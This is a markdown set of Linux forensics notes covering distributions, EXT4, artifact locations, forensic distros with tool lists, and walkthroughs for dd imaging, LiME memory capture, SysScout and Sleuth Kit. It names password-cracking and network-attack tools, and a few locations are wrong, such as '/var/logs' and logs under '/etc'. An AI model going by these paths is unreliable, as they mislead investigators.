Skip to content

Latest commit

 

History

History
318 lines (207 loc) · 12.4 KB

linux.md

File metadata and controls

318 lines (207 loc) · 12.4 KB

Linux Forensics

1. Introduction

  • What is Linux?

    • UNIX-like, open-source operating system created by Linus Torvalds.
    • Distributed under the GNU General Public License (GPL): free, publicly available source code.
    • Popular choice for enthusiasts and developers: fast, secure alternative to proprietary OS.

  • History

    • 1991: Linus Torvalds, a student in Helsinki, creates the Linux kernel.
    • Uploaded to the Internet; global community contributions spark the modern Linux ecosystem.

  • Importance in IT

    • Powers the majority of supercomputers (meteorology, statistics, HPC).

2. Popular Linux Distributions

Linux “distros” bundle the kernel with tools/configuration. Common examples:

  • Red Hat Linux Commercial distro used by corporations and banks. Powers many Fortune 500 operations.
  • Ubuntu Developed by Canonical; user-friendly for desktops, servers, cloud, and mobile devices.
  • Fedora Community-driven; sponsored by Red Hat. On the leading edge of free/open-source tech.
  • Debian One of the earliest distros (1993). Contains only free software; ~51,000 packages.
  • SUSE German-origin enterprise distro. Early 1994 release makes it one of the oldest.
  • Mint Based on Debian/Ubuntu; elegant GUI, comfortable user experience.
  • Arch Linux Independent, rolling-release, minimalist environment.
  • Linux Lite Debian/Ubuntu base with Xfce; Windows-like UI and preinstalled apps (Dropbox, VLC, LibreOffice).

3. File System

  • Default: EXT4 (successor to EXT2/3)

    • Journaling, metadata checksums → improved reliability.
    • Extents: contiguous block grouping for efficient allocation.
    • Inode metadata: persists until all hard links removed.
image image

4. Forensic Process for Linux Systems

  1. Imaging & Preservation

    • Identify partitions and devices; acquire bit‑for‑bit images.

  2. Volatile Evidence

    • RAM capture (LiME, live tools).

  3. Live Forensics

    • Tools differ: paths, logs, CLI utilities.

  4. Analysis

    • Similar to Windows but with Linux‑specific artifacts and locations.

5. Forensic Artifacts

Important directories

Directory Description
/bin Essential command binaries
/boot Bootloader files
/dev Device files
/etc System configuration
/home User home directories
/lib Shared libraries & kernel modules
/media Mount points for removable media
/opt Add-on packages
/root Root user home
/sbin System binaries
/tmp Temporary files
/var/logs Central log repository

6. Special Artifacts

Artifact Location
User profile /home/$USER
System & application logs /etc
OS info /etc/os-release
Install log /root/install.log
Hostname /etc/hostname
IP & DNS config /var/log, /etc/hosts, /etc/resolv.conf
Time zone /etc/timezone
Login history /var/log/auth.log
Recently accessed files ~/.local/share/recently-used.xbel
Command history ~/.bash_history

7. Linux Distributions for Forensic Analysis

7.1 Kali Linux

  • Origin: Formerly BackTrack; Debian‑based.

  • Purpose: Digital forensics & pentesting.

  • Tools:

    • Forensics: Autopsy, Binwalk, Capstone, chntpw, dc3dd, ddrescue, DFF, diStorm3, Dumpzilla, Extundelete, Foremost, Galleta, Guymager, iPhone backup analyzer, p0f, pdf-parser, pdgmail, REgRipper, Volatility, Xplico
    • Password: Acccheck, BruteSpray, CeWL, cisco-auditing-tool, findmyhash

7.2 DEFT Linux

  • Purpose: Law-enforcement & government forensics.

  • Tools:

    • Artifact Extraction: Extractmsg, Readpst, Msgconvert, Rifiuti2, Reglookup, pl, Evtxtract
    • Data Recovery: Catfish, Testdisk, Scalpel, Bulk_extractor
    • Imaging: Affcat, Affcopy, Affcrypto, Affsign, Cyclone, Guymager
    • Hashing: Ssdeep, Md5deep, sha256sum, sha512sum
    • Live Forensics: Evolve, Evtxtract, Rekall, Volatility
    • Malware Analysis: Analyzepdf, Balbuzard, Damm, Mastiff, Chkrootkit, Brxor, Clamscan, Yara, Rkhunter, Unxor.py, Cuckoo, Multiscanner
    • Mobile Forensics: ADB, Fastboot, Bitpim, Apktool, ipddump, idevicebackup2, iphonebackupanalyzer2
    • Mount: Bdemount, Dislocker, vmdkmnt
    • Network: ccze, lnav, multitail, CapAnalysis, Driftnet, Ettercap, Nmap, Tshark, Wireshark, Xplico, Kismet, Aircrack-ng
    • Picture Forensics: Exifprobe, Vinetto, Outguess, Mat, Stagedetect
    • Password Recovery: Cmospwd, Cup, Hashcat, John the Ripper, Pdfcrack, xhydra
    • Misc: Maltego, Tinfoleak
    • Timeline: Hfind, blkcalc, blkcat, fls, ifind, jcat, mmcat, mactime, sorter, srch_strings, fiwalk, log2timeline.py, jpeg_extract, psort.py

7.3 Parrot OS

  • Debian-based; GUI‑rich anti-forensics and pentesting tools.

7.4 Santoku Linux

  • Mobile forensics platform (Android/iOS).
  • Imaging: NAND, media cards, RAM; mobile malware analysis.

7.5 Blackbuntu

  • Ubuntu-based; penetration testing & digital forensics.

7.6 Paladin Linux

  • Ubuntu-based; over 100 forensic tools in 33 categories.

7.7 CAINE

  • Computer Aided INvestigative Environment; user‑friendly forensic suite.

8. Challenges in Linux Forensics

  • No central Registry (artifacts scattered).
  • Deleted-file metadata zeroed → recovery difficulty.
  • EXT4 features (extents, checksums) may lack tool support.
  • CLI-only tools: steeper learning curve.
  • Distro-specific customizations require per-case study.

9. Windows vs. Linux: Forensics Perspective

Windows Linux
Central Registry stores settings & metadata No Registry; config files scattered across /etc, logs, etc.
Supports FAT/NTFS Supports EXT family, Btrfs, XFS, etc.
GUI-based tools Primarily CLI-based tools
Multiple admin accounts Single root account
Recycle Bin retains deleted files Trash directories; inodes unlinked on delete
Hardware write blockers Must manually mount devices read-only
Event logs in %SystemRoot%\System32\Config Logs/config in /etc, /var/log, etc.

10. Case Studies

10.1 Listing Partitions

  1. Help: fdisk -h
image
  1. List drives: fdisk -l
image

  1. Identify /dev/sda, /dev/sdb, partitions.

    • /dev/sda: 20 GB, partitions /dev/sda1, /dev/sda2, /dev/sda5.
    • /dev/sdb: 5 GB → imaging target.

  2. Image creation:

    dd if=/dev/sdb of=image.001 bs=1M status=progress
image

10.2 Memory Acquisition (LiME)

  1. Clone repo: git clone https://github.com/504ensicsLabs/LiME/
image
  1. Build: cd LiME/src && make
image

  1. Capture RAM:

    sudo insmod ./lime-<kernel>.ko "path=../Linux_Memory.mem format=raw"
image
  1. Verify:
image

10.3 Live Forensics (SysScout)

  1. Clone & install: git clone https://github.com/joshbrunty/SysScout
image
  1. Run: bash SysScout.sh
image image

  1. Options:

    • Option 1: OS info
    image
    • Option 2: Time & timezone
    image
    • Option 3: Hostname & DNS
    image
    • Option 4: IP, routing, MAC
    image
    • Option 5: Logged-in users
    image
    • Option 6: Last logins
    image
    • Option 7: RAM & top processes
    image

10.4 Raw Image Analysis (The Sleuth Kit)

  1. Partition type:
image
  1. FS stats:
image
  1. List inodes:
image
  1. List files:
image
  1. Timestamps:
image
  1. Deleted entries:
image
  1. Deleted timestamps:
image

11. Summary

  • Linux: open-source, GPL‑licensed, community‑driven OS.
  • Multiple distros for general and forensic use.
  • EXT4: default FS with journaling and extents.
  • Forensics: imaging, memory capture, live analysis, raw image examination.
  • Key artifacts in /etc, /var/log, /home, CLI histories.
  • Specialized forensic distros: Kali, DEFT, Parrot, Santoku, etc.
  • Challenges: no Registry, metadata wiping, CLI learning curve.
  • Windows vs. Linux: architecture and tool differences.